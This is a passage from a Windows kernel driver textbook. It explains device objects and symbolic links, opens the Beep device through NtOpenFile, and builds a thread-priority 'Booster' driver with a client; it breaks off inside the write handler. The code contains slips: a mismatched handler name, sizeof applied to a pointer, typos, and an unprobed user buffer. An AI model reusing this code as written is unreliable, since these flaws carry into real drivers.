The CreateFile function (and its variants) accepts a first argument which is called “file name” in the
documentation, but really this should point to a device object’s name, where an actual file system file is
just one particular case. The name CreateFile is somewhat misleading - the word “file” here means
“file object”. Opening a handle to a file or device creates an instance of the kernel structure FILE_OBJECT,
another semi-documented structure.
More precisely, CreateFile accepts a symbolic link, a kernel object that knows how to point to another
kernel object. (You can think of a symbolic link as similar in principle to a file system shortcut.) All the
symbolic links that can be used from the user mode CreateFile or CreateFile2 calls are located in
the Object Manager directory named ??. You can see the contents of this directory with the Sysinternals
WinObj tool. Figure 3-3 shows this directory (named Global?? in WinObj).
Figure 3-3: Symbolic links directory in WinObj
Some of the names seem familiar, such as C:, Aux, Con, and others. Indeed, these are valid “file names”
for CreateFile calls. Other entries look like long cryptic strings, and these in fact are generated by the
Chapter 3: Kernel Programming Basics
51
I/O system for hardware-based drivers that call the IoRegisterDeviceInterface API. These types
of symbolic links are not useful for the purpose of this book.
Most of the symbolic links in the \?? directory point to an internal device name under the \Device directory.
The names in this directory are not directly accessible by user-mode callers. But they can be accessed by
kernel callers using the IoGetDeviceObjectPointer API.
A canonical example is the driver for Process Explorer. When Process Explorer is launched with
administrator rights, it installs a driver. This driver gives Process Explorer powers beyond those that can
be obtained by user-mode callers, even if running elevated. For example, Process Explorer in its Threads
dialog for a process can show the complete call stack of a thread, including functions in kernel mode. This
type of information is not possible to obtain from user mode; its driver provides the missing information.
The driver installed by Process Explorer creates a single device object so that Process Explorer is able to
open a handle to that device and make requests. This means that the device object must be named, and
must have a symbolic link in the ?? directory; and it’s there, called PROCEXP152, probably indicating
driver version 15.2 (at the time of writing). Figure 3-4 shows this symbolic link in WinObj.
Figure 3-4: Process Explorer’s symbolic link in WinObj
Notice the symbolic link for Process Explorer’s device points to \Device\PROCEXP152, which is the
internal name only accessible to kernel callers (and the native APIs NtOpenFile and NtCreateFile,
as shown in the next section). The actual CreateFile call made by Process Explorer (or any other client)
based on the symbolic link must be prepended with \\.\. This is necessary so that the I/O manager’s
parser will not assume the string “PROCEXP152” refers to a file with no extension in the current directory.
Here is how Process Explorer would open a handle to its device object (note the double backslashes because
of the backslash being an escape character in C/C++):
HANDLE hDevice = CreateFile(L"\\\\.\\PROCEXP152",
GENERIC_WRITE | GENERIC_READ, 0, nullptr, OPEN_EXISTING,
0, nullptr);
With C++ 11 and later, you can write strings without escaping the backslash character. The
device path in the above code can be written like so: LR"(\\.\PROCEXP152)". L indicates
Unicode (as always), while anything between R"( and )" is not escaped.
Chapter 3: Kernel Programming Basics
52
You can try the above code yourself. If Process Explorer has run elevated at least once on the system
since boot, its driver should be running (you can verify with the tool itself), and the call to CreateFile
will succeed if the client is running elevated.
A driver creates a device object using the IoCreateDevice function. This function allocates and
initializes a device object structure and returns its pointer to the caller. The device object instance is
stored in the DeviceObject member of the DRIVER_OBJECT structure. If more than one device object
is created, they form a singly linked list, where the member NextDevice of the DEVICE_OBJECT points
to the next device object. Note that the device objects are inserted at the head of the list, so the first device
object created is stored last; its NextDevice points to NULL. These relationships are depicted in figure
3-5.
Figure 3-5: Driver and Device objects
Opening Devices Directly
The existence of a symbolic link makes it easy to open a handle to a device with the documented
CreateFile user-mode API (or from the ZwOpenFile API in the kernel). It is sometimes useful,
however, to be able to open device objects without going through a symbolic link. For example, a device
object might not have a symbolic link, because its driver decided (for whatever reason) not to provide one.
The native NtOpenFile (and NtCreateFile) function can be used to open a device object directly.
Microsoft never recommends using native APIs, but this function is somewhat documented for user-mode
use . Its definition is available in the <Winternl.h> header file:
NTAPI NtOpenFile (
OUT PHANDLE FileHandle,
IN
ACCESS_MASK DesiredAccess,
IN
POBJECT_ATTRIBUTES ObjectAttributes,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN
ULONG ShareAccess,
IN
ULONG OpenOptions);
Chapter 3: Kernel Programming Basics
53
Notice the similarity to the ZwOpenFile we used in an earlier section - this is the same function prototype,
just invoked here from user mode, eventually to land at NtOpenFile within the I/O manager. The function
requires usage of an OBJECT_ATTRIBUTES structure, described earlier in this chapter.
The above prototype uses old macros such as IN, OUT and others. These have been replaced by SAL
annotations. Unfortunately, some header files were not yet converted to SAL.
To demonstrate using NtOpenFile from user mode, we’ll create an application to play a single sound.
Normally, the Beep Windows user-mode API provides such a service:
BOOL Beep(
_In_ DWORD dwFreq,
_In_ DWORD dwDuration);
The function accepts the frequency to play (in Hertz), and the duration to play, in milliseconds. The
function is synchronous, meaning it does not return until the duration has elapsed.
The Beep API works by calling a device named \Device\Beep (you can find it in WinObj), but the beep
device driver does not create a symbolic link for it. However, we can open a handle to the beep device
using NtOpenFile. Then, to play a sound, we can use the DeviceIoContol function with the correct
parameters. Although it’s not too difficult to reverse engineer the beep driver workings, fortunately we
don’t have to. The SDK provides the <ntddbeep.h> file with the required definitions, including the device
name itself.
We’ll start by creating a C++ Console application in Visual Studio. Before we get to the main function, we
need some #includes:
#include <Windows.h>
#include <winternl.h>
#include <stdio.h>
#include <ntddbeep.h>
<winternl.h> provides the definition for NtOpenFile (and related data structures), while <ntddbeep.h>
provides the beep-specific definitions.
Since we will be using NtOpenFile, we must also link against NtDll.Dll, which we can do by adding a
#pragma to the source code, or add the library to the linker settings in the project’s properties. Let’s go
with the former, as it’s easier, and is not tied to the project’s properties:
#pragma comment(lib, "ntdll")
Without the above linkage, the linker would issue an “unresolved external” error.
Chapter 3: Kernel Programming Basics
54
Now we can start writing main, where we accept optional command line arguments indicating the
frequency and duration to play:
int main(int argc, const char* argv[]) {
printf("beep [<frequency> <duration_in_msec>]\n");
int freq = 800, duration = 1000;
if (argc > 2) {
freq = atoi(argv[1]);
duration = atoi(argv[2]);
}
The next step is to open the device handle using NtOpenFile:
HANDLE hFile;
OBJECT_ATTRIBUTES attr;
UNICODE_STRING name;
RtlInitUnicodeString(&name, L"\\Device\\Beep");
InitializeObjectAttributes(&attr, &name, OBJ_CASE_INSENSITIVE,
nullptr, nullptr);
IO_STATUS_BLOCK ioStatus;
NTSTATUS status = ::NtOpenFile(&hFile, GENERIC_WRITE, &attr, &ioStatus, 0, 0);
The line to initialize the device name can be replaced with:
RtlInitUnicodeString(&name, DD_BEEP_DEVICE_NAME_U);
The DD_BEEP_DEVICE_NAME_U macro is conveniently supplied as part of <ntddbeep.h>.
If the call succeeds, we can play the sound. To do that, we call DeviceIoControl with a control code
defined in <ntddbeep.h> and use a structure defined there as well to fill in the frequency and duration:
if (NT_SUCCESS(status)) {
BEEP_SET_PARAMETERS params;
params.Frequency = freq;
params.Duration = duration;
DWORD bytes;
//
// play the sound
//
printf("Playing freq: %u, duration: %u\n", freq, duration);
::DeviceIoControl(hFile, IOCTL_BEEP_SET, ¶ms, sizeof(params),
nullptr, 0, &bytes, nullptr);
Chapter 3: Kernel Programming Basics
55
//
// the sound starts playing and the call returns immediately
// Wait so that the app doesn't close
//
::Sleep(duration);
::CloseHandle(hFile);
}
The input buffer passed to DeviceIoControl should be a BEEP_SET_PARAMETERS structure, which
we pass in along with its size. The last piece of the puzzle is to use the Sleep API to wait based on the
duration, otherwise the handle to the device would be closed and the sound cut off.
Write an application that plays an array of sounds by leveraging the above code.
Summary
In this chapter, we looked at some of the fundamental kernel data structures, concepts, and APIs. In the next
chapter, we’ll build a complete driver, and a client application, expanding on the information presented
thus far.
Chapter 4: Driver from Start to Finish
In this chapter, we’ll use many of the concepts we learned in previous chapters and build a simple, yet
complete, driver, and an associated client application, while filling in some of the missing details from
previous chapters. We’ll deploy the driver and use its capabilities - perform some operation in kernel
mode that is difficult, or impossible to do, in user mode.
In this chapter:
• Introduction
• Driver Initialization
• Client Code
• The Create and Close Dispatch Routines
• The Write Dispatch Routine
• Installing and Testing
Introduction
The problem we’ll solve with a simple kernel driver is the inflexibility of setting thread priorities using
the Windows API. In user mode, a thread’s priority is determined by a combination of its process Priority
Class with an offset on a per thread basis, that has a limited number of levels.
Changing a process priority class (shown as Base priority column in Task Manager) can be achieved with
the SetPriorityClass function that accepts a process handle and one of the six supported priority
classes. Each priority class corresponds to a priority level, which is the default priority for threads created
in that process. A particular thread’s priority can be changed with the SetThreadPriority function,
accepting a thread handle and one of several constants corresponding to offsets around the base priority
class. Table 4-1 shows the available thread priorities based on the process priority class and the thread’s
priority offset.
Chapter 4: Driver from Start to Finish
57
Table 4-1: Legal values for thread priorities with the Windows APIs
Priority Class
- Sat
-2
-1
0 (default)
+1
+2
+ Sat
Comments
Idle
1
2
3
4
5
6
15
Task Manager refers to Idle as “Low”
Below Normal
1
4
5
6
7
8
15
Normal
1
6
7
8
9
10
15
Above Normal
1
8
9
10
11
12
15
High
1
11
12
13
14
15
15
Only six levels are available (not seven).
Real-time
16
22
23
24
25
26
31
All levels between 16 to 31 can be
selected.
The values acceptable to SetThreadPriority specify the offset. Five levels correspond to the offsets
-2 to +2: THREAD_PRIORITY_LOWEST (-2), THREAD_PRIORITY_BELOW_NORMAL (-1), THREAD_PRIOR-
ITY_NORMAL (0), THREAD_PRIORITY_ABOVE_NORMAL (+1), THREAD_PRIORITY_HIGHEST (+2). The
remaining two levels, called Saturation levels, set the priority to the two extremes supported by that
priority class: THREAD_PRIORITY_IDLE (-Sat) and THREAD_PRIORITY_TIME_CRITICAL (+Sat).
The following code example changes the current thread’s priority to 11:
SetPriorityClass(GetCurrentProcess(),
ABOVE_NORMAL_PRIORITY_CLASS);
// process base=10
SetThreadPriority(GetCurrentThread(),
THREAD_PRIORITY_ABOVE_NORMAL);
// +1 offset for thread
The Real-time priority class does not imply Windows is a real-time OS; Windows does not
provide some of the timing guarantees normally provided by true real-time operating systems.
Also, since Real-time priorities are very high and compete with many kernel threads doing
important work, such a process must be running with administrator privileges; otherwise,
attempting to set the priority class to Real-time causes the value to be set to High.
There are other differences between the real-time priorities and the lower priority classes.
Consult the Windows Internals book for more information.
Table 4-1 shows the problem we will address quite clearly. Only a small set of priorities are available to
set directly. We would like to create a driver that would circumvent these limitations and allow setting a
thread’s priority to any number, regardless of its process priority class.
Driver Initialization
We’ll start building the driver in the same way we did in chapter 2. Create a new “WDM Empty Project”
named Booster (or another name of your choosing) and delete the INF file created by the wizard. Next,
add a new source file to the project, called Booster.cpp (or any other name you prefer). Add the basic
#include for the main WDK header and an almost empty DriverEntry:
Chapter 4: Driver from Start to Finish
58
#include <ntddk.h>
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
return STATUS_SUCCESS;
}
Most software drivers need to do the following in DriverEntry:
• Set an Unload routine.
• Set dispatch routines the driver supports.
• Create a device object.
• Create a symbolic link to the device object.
Once all these operations are performed, the driver is ready to take requests.
The first step is to add an Unload routine and point to it from the driver object. Here is the new
DriverEntry with the Unload routine:
// prototypes
void BoosterUnload(PDRIVER_OBJECT DriverObject);
// DriverEntry
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
DriverObject->DriverUnload = BoosterUnload;
return STATUS_SUCCESS;
}
void BoosterUnload(PDRIVER_OBJECT DriverObject) {
// empty for now
}
We’ll add code to the Unload routine as needed when we do actual work in DriverEntry that needs to
be undone.
Next, we need to set up the dispatch routines that we want to support. Practically all drivers must support
IRP_MJ_CREATE and IRP_MJ_CLOSE, otherwise there would be no way to open a handle to any device
for this driver. So we add the following to DriverEntry:
Chapter 4: Driver from Start to Finish
59
DriverObject->MajorFunction[IRP_MJ_CREATE] = BoosterCreateClose;
DriverObject->MajorFunction[IRP_MJ_CLOSE]
= BoosterCreateClose;
We’re pointing the Create and Close major functions to the same routine. This is because, as we’ll see
shortly, they will do the same thing: simply approve the request. In more complex cases, these could be
separate functions, where in the Create case the driver can (for instance) check to see who the caller is and
only let approved callers succeed with opening a handle.
All major functions have the same prototype (they are part of an array of function pointers), so we have
to add a prototype for BoosterCreateClose. The prototype for these functions is as follows:
NTSTATUS BoosterCreateClose(PDEVICE_OBJECT DeviceObject, PIRP Irp);
The function must return NTSTATUS, and accepts a pointer to a device object and a pointer to an I/O
Request Packet (IRP). An IRP is the primary object where the request information is stored, for all types
of requests. We’ll dig deeper into an IRP in chapter 7, but we’ll look at the basics later in this chapter, since
we require it to complete our driver.
Passing Information to the Driver
The Create and Close operations we set up are required, but certainly not enough. We need a way to tell
the driver which thread and to what value to set its priority. From a user mode client’s perspective, there
are three basic functions it can use: WriteFile, ReadFile and DeviceIoControl.
For our driver’s purposes, we can use either WriteFile or DeviceIoControl. Read doesn’t make
sense, because we’re passing information to the driver, rather than from the driver. So which is better,
WriteFile or DeviceIoControl? This is mostly a matter of taste, but the general wisdom here is to
use Write if it’s really a write operation (logically); for anything else - DeviceIoControl is preferred,
as it’s a generic mechanism for passing data to and from the driver.
Since changing a thread’s priority is not a purely Write operation, DeviceIoControl makes more sense,
but we’ll use WriteFile, as it’s a bit easier to handle. We’ll look at all the details in chapter 7. WriteFile
has the following prototype:
BOOL WriteFile(
_In_
HANDLE hFile,
_In_reads_bytes_opt_(nNumberOfBytesToWrite) LPCVOID lpBuffer,
_In_
DWORD nNumberOfBytesToWrite,
_Out_opt_
LPDWORD lpNumberOfBytesWritten,
_Inout_opt_ LPOVERLAPPED lpOverlapped);
Our driver has to export its handling of a write operation capability by assigning a function pointer to the
IRP_MJ_WRITE index of the MajorFunction array in the driver object:
Chapter 4: Driver from Start to Finish
60
DriverObject->MajorFunction[IRP_MJ_WRITE] = BoosterWrite;
BoosterWrite must have the same prototype as all major function code handlers:
NTSTATUS BoosterWrite(PDEVICE_OBJECT DeviceObject, PIRP Irp);
Client / Driver Communication Protocol
Given that we use WriteFile for client/driver communication, we now must define the actual semantics.
WriteFile allows passing in a buffer, for which we need to define proper semantics. This buffer should
contain the two pieces of information required so the driver can do its thing: the thread id and the priority
to set for it.
These pieces of information must be usable both by the driver and the client. The client would supply the
data, and the driver would act on it. This means these definitions must be in a separate file that must be
included by both the driver and client code.
For this purpose, we’ll add a header file named BoosterCommon.h to the driver project. This file will also
be used later by the user-mode client.
Within this file, we need to define the data structure to pass to the driver in the WriteFile buffer,
containing the thread ID and the priority to set:
struct ThreadData {
ULONG ThreadId;
int Priority;
};
We need the thread’s unique ID and the target priority. Thread IDs are 32-bit unsigned integers, so we
select ULONG as the type. The priority should be a number between 1 and 31, so a simple 32-bit integer
will do.
We cannot normally use DWORD - a common type defined in user mode headers - because it’s not defined
in kernel mode headers. ULONG, on the other hand, is defined in both. It would be easy enough to define
it ourselves, but ULONG is the same anyway.
Creating the Device Object
We have more initializations to do in DriverEntry. Currently, we don’t have any device object and so
there is no way to open a handle and reach the driver. A typical software driver needs just one device object,
with a symbolic link pointing to it, so that user-mode clients can obtain handles easily with CreateFile.
Creating the device object requires calling the IoCreateDevice API, declared as follows (some SAL
annotations omitted/simplified for clarity):
Chapter 4: Driver from Start to Finish
61
NTSTATUS IoCreateDevice(
_In_
PDRIVER_OBJECT DriverObject,
_In_
ULONG DeviceExtensionSize,
_In_opt_
PUNICODE_STRING DeviceName,
_In_
DEVICE_TYPE DeviceType,
_In_
ULONG DeviceCharacteristics,
_In_
BOOLEAN Exclusive,
_Outptr_
PDEVICE_OBJECT *DeviceObject);
The parameters to IoCreateDevice are described below:
• DriverObject - the driver object to which this device object belongs to. This should be simply the
driver object passed to the DriverEntry function.
• DeviceExtensionSize - extra bytes that would be allocated in addition to sizeof(DEVICE_OB-
JECT). Useful for associating some data structure with a device. It’s less useful for software drivers
creating just a single device object, since the state needed for the device can simply be managed by
global variables.
• DeviceName - the internal device name, typically created under the \Device Object Manager
directory.
• DeviceType - relevant to some type of hardware-based drivers. For software drivers, the value
FILE_DEVICE_UNKNOWN should be used.
• DeviceCharacteristics - a set of flags, relevant for some specific drivers. Software drivers specify
zero or FILE_DEVICE_SECURE_OPEN if they support a true namespace (rarely needed by software
drivers). More information on device security is presented in chapter 8.
• Exclusive - should more than one file object be allowed to open the same device? Most drivers should
specify FALSE, but in some cases TRUE is more appropriate; it forces a single client at a time for the
device.
• DeviceObject - the returned pointer, passed as an address of a pointer. If successful, IoCreat-
eDevice allocates the structure from non-paged pool and stores the resulting pointer inside the
dereferenced argument.
Before calling IoCreateDevice we must create a UNICODE_STRING to hold the internal device name:
UNICODE_STRING devName = RTL_CONSTANT_STRING(L"\\Device\\Booster");
// alternatively,
// RtlInitUnicodeString(&devName, L"\\Device\\Booster");
The device name could be anything but should be in the \Device object manager directory. There are
two ways to initialize a UNICODE_STRING with a constant string. The first is using RtlInitUnicode-
String, which works just fine. But RtlInitUnicodeString must count the number of characters in
the string to initialize the Length and MaximumLength appropriately. Not a big deal in this case, but
there is a quicker way - using the RTL_CONSTANT_STRING macro, which calculates the length of the
string statically (at compile time), meaning it can only work correctly with literal strings.
Now we are ready to call the IoCreateDevice function:
Chapter 4: Driver from Start to Finish
62
PDEVICE_OBJECT DeviceObject;
NTSTATUS status = IoCreateDevice(
DriverObject,
// our driver object
0,
// no need for extra bytes
&devName,
// the device name
FILE_DEVICE_UNKNOWN, // device type
0,
// characteristics flags
FALSE,
// not exclusive
&DeviceObject);
// the resulting pointer
if (!NT_SUCCESS(status)) {
KdPrint(("Failed to create device object (0x%08X)\n", status));
return status;
}
If all goes well, we now have a pointer to our device object. The next step is to make this device object
accessible to user-mode callers by providing a symbolic link. Creating a symbolic link involves calling
IoCreateSymbolicLink:
NTSTATUS IoCreateSymbolicLink(
_In_ PUNICODE_STRING SymbolicLinkName,
_In_ PUNICODE_STRING DeviceName);
The following lines create a symbolic link and connect it to our device object:
UNICODE_STRING symLink = RTL_CONSTANT_STRING(L"\\??\\Booster");
status = IoCreateSymbolicLink(&symLink, &devName);
if (!NT_SUCCESS(status)) {
KdPrint(("Failed to create symbolic link (0x%08X)\n", status));
IoDeleteDevice(DeviceObject);
// important!
return status;
}
The IoCreateSymbolicLink does the work by accepting the symbolic link and the target of the link.
Note that if the creation fails, we must undo everything done so far - in this case just the fact the device
object was created - by calling IoDeleteDevice. More generally, if DriverEntry returns any failure
status, the Unload routine is not called. If we had more initialization steps to do, we would have to
remember to undo everything until that point in case of failure. We’ll see a more elegant way of handling
this in chapter 6.
Once we have the symbolic link and the device object set up, DriverEntry can return success, indicating
the driver is now ready to accept requests.
Before we move on, we must not forget the Unload routine. Assuming DriverEntry completed
successfully, the Unload routine must undo whatever was done in DriverEntry. In our case, there are
two things to undo: device object creation and symbolic link creation. We’ll undo them in reverse order:
Chapter 4: Driver from Start to Finish
63
void BoosterUnload(_In_ PDRIVER_OBJECT DriverObject) {
UNICODE_STRING symLink = RTL_CONSTANT_STRING(L"\\??\\Booster");
// delete symbolic link
IoDeleteSymbolicLink(&symLink);
// delete device object
IoDeleteDevice(DriverObject->DeviceObject);
}
Notice the device object pointer is extracted from the driver object, as it’s the only argument we get in the
Unload routine. It’s certainly possible to store the device object pointer in a global variable and access it
here directly, but there is no need. Global variables usage should be kept to a minimum.
Client Code
At this point, it’s worth writing the user-mode client code. Everything we need for the client has already
been defined.
Add a new C++ Console Application project to the solution named Boost (or some other name of your
choosing). The Visual Studio wizard should create a single source file with some “hello world” type of
code. You can safely delete all the contents of the file.
First, we add the required #includes to the Boost.cpp file:
#include <windows.h>
#include <stdio.h>
#include "..\Booster\BoosterCommon.h"
Note that we include the common header file created by the driver to be shared with the client.
Change the main function to accept command line arguments. We’ll accept a thread ID and a priority
using command line arguments and request the driver to change the priority of the thread to the given
value.
int main(int argc, const char* argv[]) {
if (argc < 3) {
printf("Usage: Boost <threadid> <priority>\n");
return 0;
}
//
// extract from command line
//
int tid = atoi(argv[1]);
int priority = atoi(argv[2]);
Chapter 4: Driver from Start to Finish
64
Next, we need to open a handle to our device. The “file name” to CreateFile should be the symbolic
link prepended with “\\.\”. The entire call should look like this:
HANDLE hDevice = CreateFile(L"\\\\.\\Booster", GENERIC_WRITE,
0, nullptr, OPEN_EXISTING, 0, nullptr);
if (hDevice == INVALID_HANDLE_VALUE)
return Error("Failed to open device");
The Error function simply prints some text with the last Windows API error:
int Error(const char* message) {
printf("%s (error=%u)\n", message, GetLastError());
return 1;
}
The CreateFile call should reach the driver in its IRP_MJ_CREATE dispatch routine. If the driver is
not loaded at this time - meaning there is no device object and no symbolic link - we’ll get error number
2 (file not found).
Now that we have a valid handle to our device, it’s time to set up the call to Write. First, we need to
create a ThreadData structure and fill in the details:
ThreadData data;
data.ThreadId = tid;
data.Priority = priority;
Now we’re ready to call WriteFile and close the device handle afterwards:
DWORD returned;
BOOL success = WriteFile(hDevice,
&data, sizeof(data),
// buffer and length
&returned, nullptr);
if (!success)
return Error("Priority change failed!");
printf("Priority change succeeded!\n");
CloseHandle(hDevice);
The call to WriteFile reaches the driver by invoking the IRP_MJ_WRITE major function routine.
At this point, the client code is complete. All that remains is to implement the dispatch routines we declared
on the driver side.
Chapter 4: Driver from Start to Finish
65
The Create and Close Dispatch Routines
Now we’re ready to implement the three dispatch routines defined by the driver. The simplest by far are
the Create and Close routines. All that’s needed is completing the request with a successful status. Here
is the complete Create/Close dispatch routine implementation:
NTSTATUS BoosterCreateClose(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
UNREFERENCED_PARAMETER(DeviceObject);
Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
Every dispatch routine accepts the target device object and an I/O Request Packet (IRP). We don’t care
much about the device object, since we only have one, so it must be the one we created in DriverEntry.
The IRP on the other hand, is extremely important. We’ll dig deeper into IRPs in chapter 6, but we need
to take a quick look at IRPs now.
An IRP is a semi-documented structure that represents a request, typically coming from one of the
managers in the Executive: the I/O Manager, the Plug & Play Manager, or the Power Manager. With
a simple software driver, that would most likely be the I/O Manager. Regardless of the creator of the IRP,
the driver’s purpose is to handle the IRP, which means looking at the details of the request and doing what
needs to be done to complete it.
Every request to the driver always arrives wrapped in an IRP, whether that’s a Create, Close, Read, Write,
or any other IRP. By looking at the IRP’s members, we can figure out the type and details of the request
(technically, the dispatch routine itself was pointed to based on the request type, so in most cases you
already know the request type). It’s worth mentioning that an IRP never arrives alone; it’s accompanied
by one or more structures of type IO_STACK_LOCATION. In simple cases like our driver, there is a single
IO_STACK_LOCATION. In more complex cases where there are filter drivers above or below us, multiple
IO_STACK_LOCATION instances exist, one for each layer in the device stack. (We’ll discuss this more
thoroughly in chapter 7). Simply put, some of the information we need is in the base IRP structure, and
some is in the IO_STACK_LOCATION for our “layer” in the device stack.
In the case of Create and Close, we don’t need to look into any members. We just need to set the completion
status of the IRP in its IoStatus member (of type IO_STATUS_BLOCK), which has two members:
• Status (NTSTATUS) - indicating the status this request should complete with.
• Information (ULONG_PTR) - a polymorphic member, meaning different things in different request
types. In the case of Create and Close, a zero value is just fine.
To complete the IRP, we call IoCompleteRequest. This function has a lot to do, but basically it
propagates the IRP back to its creator (typically the I/O Manager), and that manager notifies the client
that the operation has completed and frees the IRP. The second argument is a temporary priority boost
Chapter 4: Driver from Start to Finish
66
value that a driver can provide to its client. In most cases for a software driver, a value of zero is fine
(IO_NO_INCREMENT is defined as zero). This is especially true since the request completed synchronously,
so no reason the caller should get a priority boost. More information on this function is provided in chapter
7.
The last thing to do is return the same status as the one put into the IRP. This may seem like a useless
duplication, but it is necessary (the reason will be clearer in a later chapter).
You may be tempted to write the last line of BoosterCreateClose like so:
return Irp->IoStatus.Status; So that the returned value is always the same as the one
stored in the IRP. This code is buggy, however, and will cause a BSOD in most cases. The reason
is that after IoCompleteRequest is invoked, the IRP pointer should be considered “poison”,
as it’s more likely than not that it has already been deallocated by the I/O manager.
The Write Dispatch Routine
This is the crux of the matter. All the driver code so far has led to this dispatch routine. This is the one
doing the actual work of setting a given thread to a requested priority.
The first thing we need to do is check for errors in the supplied data. In our case, we expect a structure of
type ThreadData. The first thing is to do is retrieve the current IRP stack location, because the size of
the buffer happens to be stored there:
NTSTATUS BoosterDeviceControl(PDEVICE_OBJECT, PIRP Irp) {
auto status = STATUS_SUCCESS;
ULONG_PTR information = 0;
// track used bytes
// irpSp is of type PIO_STACK_LOCATION
auto irpSp = IoGetCurrentIrpStackLocation(Irp);
The key to getting the information for any IRP is to look inside the IO_STACK_LOCATION associated with
the current device layer. Calling IoGetCurrentIrpStackLocation returns a pointer to the correct
IO_STACK_LOCATION. In our case, there is just one IO_STACK_LOCATION, but in the general case there
could be more (in fact, a filter may be above our device), so calling IoGetCurrentIrpStackLocation
is the right thing to do.
The main ingredient in an IO_STACK_LOCATION is a monstrous union identified with the member named
Parameters, which holds a set of structures, one for each type of IRP. In the case of IRP_MJ_WRITE,
the structure to look at is Parameters.Write.
Now we can check the buffer size to make sure it’s at least the size we expect:
Chapter 4: Driver from Start to Finish
67
do {
if (irpSp->Parameters.Write.Length < sizeof(ThreadData)) {
status = STATUS_BUFFER_TOO_SMALL;
break;
}
The do keyword opens a simple do/while(false) block that allows using the break keyword to bail
out early in case of an error. We’ll discuss this technique in greater detail in chapter 7.
Next, we need to grab the user buffer’s pointer, and check if the priority value is in the legal range (0 to
31). We also check if the pointer itself is NULL, as it’s possible for the client to pass a NULL pointer for
the buffer, but the length may be greater than zero. The buffer’s address is provided in the UserBuffer
member of the IRP:
auto data = static_cast<ThreadData*>(Irp->UserBuffer);
if (data == nullptr || data->Priority < 1 || data->Priority > 31) {
status = STATUS_INVALID_PARAMETER;
break;
}
UserBuffer is typed as a void pointer, so we need to cast it to the expected type. Then we check the
priority value, and if not in range change the status to STATUS_INVALID_PARAMETER and break out of
the “loop”.
Notice the order of checks: the pointer is compared to NULL first, and only if non-NULL, the
next check takes place. If data is NULL, however, no further checks are made. This behavior
is guaranteed by the C/C++ standard, known as short circuit evaluation.
The use of static_cast asks the compiler to do check if the cast makes sense. Technically,
the C++ compiler allows casting a void pointer to any other pointer, so it doesn’t look that
useful in this case, and perhaps a C-style cast would be simpler to write. Still, it’s a good habit
to have, as it can catch some errors at compile time.
We’re getting closer to our goal. The API we would like to use is KeSetPriorityThread, prototyped as
follows:
KPRIORITY KeSetPriorityThread(
_Inout_ PKTHREAD Thread,
_In_
KPRIORITY Priority);
The KPRIORITY type is just an 8-bit integer. The thread itself is identified by a pointer to a KTHREAD
object. KTHREAD is one part of the way the kernel manages threads. It’s completely undocumented, but
we need the pointer value anyway. We have the thread ID from the client, and need to somehow get a
hold of a pointer to the real thread object in kernel space. The function that can look up a thread by its ID
is aptly named PsLookupThreadByThreadId. To get its definition, we need to add another #include:
Chapter 4: Driver from Start to Finish
68
#include <ntifs.h>
You must add this #include before <ntddk.h>, otherwise you’ll get compilation errors. In fact,
you can remove <ntddk.h> entirely, as it’s included by <ntifs.h>.
Here is the definition for PsLookupThreadByThreadId:
NTSTATUS PsLookupThreadByThreadId(
_In_
HANDLE ThreadId,
_Outptr_
PETHREAD *Thread);
Again, we see that a thread ID is required, but its type is HANDLE - but it is the ID that we need nonetheless.
The resulting pointer is typed as PETHREAD or pointer to ETHREAD. ETHREAD is completely opaque.
Regardless, we seem to have a problem since KeSetPriorityThread accepts a PKTHREAD rather than
PETHREAD. It turns out these are the same, because the first member of an ETHREAD is a KTHREAD (the
member is named Tcb). We’ll prove all this in the next chapter when we use the kernel debugger. Here is
the beginning of the definition of ETHREAD:
typedef struct _ETHREAD {
KTHREAD Tcb;
// more members
} ETHREAD;
The bottom line is we can safely switch PKTHREAD for PETHREAD or vice versa when needed without a
hitch.
Now we can turn our thread ID into a pointer:
PETHREAD thread;
status = PsLookupThreadByThreadId(ULongToHandle(data->ThreadId),
&thread);
if (!NT_SUCCESS(status))
break;
The call to PsLookupThreadByThreadId can fail, the main reason being that the thread ID does not
reference any thread in the system. If the call fails, we simply break and let the resulting NTSTATUS
propagate out of the “loop”.
We are finally ready to change the thread’s priority. But wait - what if after the last call succeeds, the
thread is terminated, just before we set its new priority? Rest assured, this cannot happen. Technically,
the thread can terminate (from an execution perspective) at that point, but that will not make our pointer
a dangling one. This is because the lookup function, if successful, increments the reference count on the
kernel thread object, so it cannot die until we explicitly decrement the reference count. Here is the call to
make the priority change:
Chapter 4: Driver from Start to Finish
69
auto oldPriority = KeSetPriorityThread(thread, data->Priority);
KdPrint(("Priority change for thread %u from %d to %d succeeded!\n",
data->ThreadId, oldPriority, data->Priority));
We get back the old priority, which we output with KdPrint for debugging purposes. All that’s left to do
now is decrement the thread object’s reference; otherwise, we have a leak on our hands (the thread object
will never die), which will only be resolved in the next system boot. The function that accomplishes this
feat is ObDereferenceObject:
ObDereferenceObject(thread);
We should also report to the client that we used the buffer provided. This is where the information
variable is used:
information = sizeof(data);
We’ll write that value to the IRP before completing it. This is the value returned as the second to last
argument from the client’s WritewFile call. All that’s left to do is to close the while “loop” and complete
the IRP with whatever status we happen to have at this time.
// end the while "loop"
} while (false);
//
// complete the IRP with the status we got at this point
//
Irp->IoStatus.Status = status;
Irp->IoStatus.Information = information;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return status;
}
And we’re done! For reference, here is the complete IRP_MJ_WRITE handler:
NTSTATUS BoosterWrite(PDEVICE_OBJECT, PIRP Irp) {
auto status = STATUS_SUCCESS;
ULONG_PTR information = 0;
auto irpSp = IoGetCurrentIrpStackLocation(Irp);
do {
if (irpSp->Parameters.Write.Length < sizeof(ThreadData)) {
status = STATUS_BUFFER_TOO_SMALL;
break;
Chapter 4: Driver from Start to Finish
70
}
auto data = static_cast<ThreadData*>(Irp->UserBuffer);
if (data == nullptr
|| data->Priority < 1 || data->Priority > 31) {
status = STATUS_INVALID_PARAMETER;
break;
}
PETHREAD thread;
status = PsLookupThreadByThreadId(
ULongToHandle(data->ThreadId), &thread);
if (!NT_SUCCESS(status)) {
break;
}
auto oldPriority = KeSetPriorityThread(thread, data->Priority);
KdPrint(("Priority change for thread %u from %d to %d succeeded!\n",
